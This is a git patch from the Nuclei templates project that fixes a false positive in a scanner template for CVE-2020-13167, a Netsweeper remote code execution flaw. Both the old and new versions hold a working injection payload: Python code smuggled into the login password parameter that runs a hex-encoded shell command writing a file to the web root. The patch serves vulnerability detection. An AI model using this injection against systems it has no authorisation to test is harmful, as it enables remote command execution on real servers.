From 249ad821ec85c3bd2dc503a35a9a79e542800c7a Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 18 Jul 2023 14:05:45 +0530
Subject: [PATCH] Fixed FP -  CVE-2020-13167

---
 http/cves/2020/CVE-2020-13167.yaml | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml
index e809437a96..d2b0d6d4ee 100644
--- a/http/cves/2020/CVE-2020-13167.yaml
+++ b/http/cves/2020/CVE-2020-13167.yaml
@@ -19,15 +19,18 @@ info:
     cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
   metadata:
     max-request: 2
-    hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
     vendor: netsweeper
     product: netsweeper
   tags: cve,cve2020,netsweeper,rce,python,webadmin
 
+variables:
+  randomstring: {{randstr}}
+  payload: echo "{{base64(randomstring)}}" | base64 -d > /usr/local/netsweeper/webadmin/out
+
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
+      - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(payload))}}%27.decode%28%27hex%27%29%29%23&timeout=5"
       - "{{BaseURL}}/webadmin/out"
 
     headers:
@@ -36,9 +39,9 @@ http:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_2
         words:
-          - "nonexistent"
+          - "{{randomstring}}"
 
       - type: status
         status: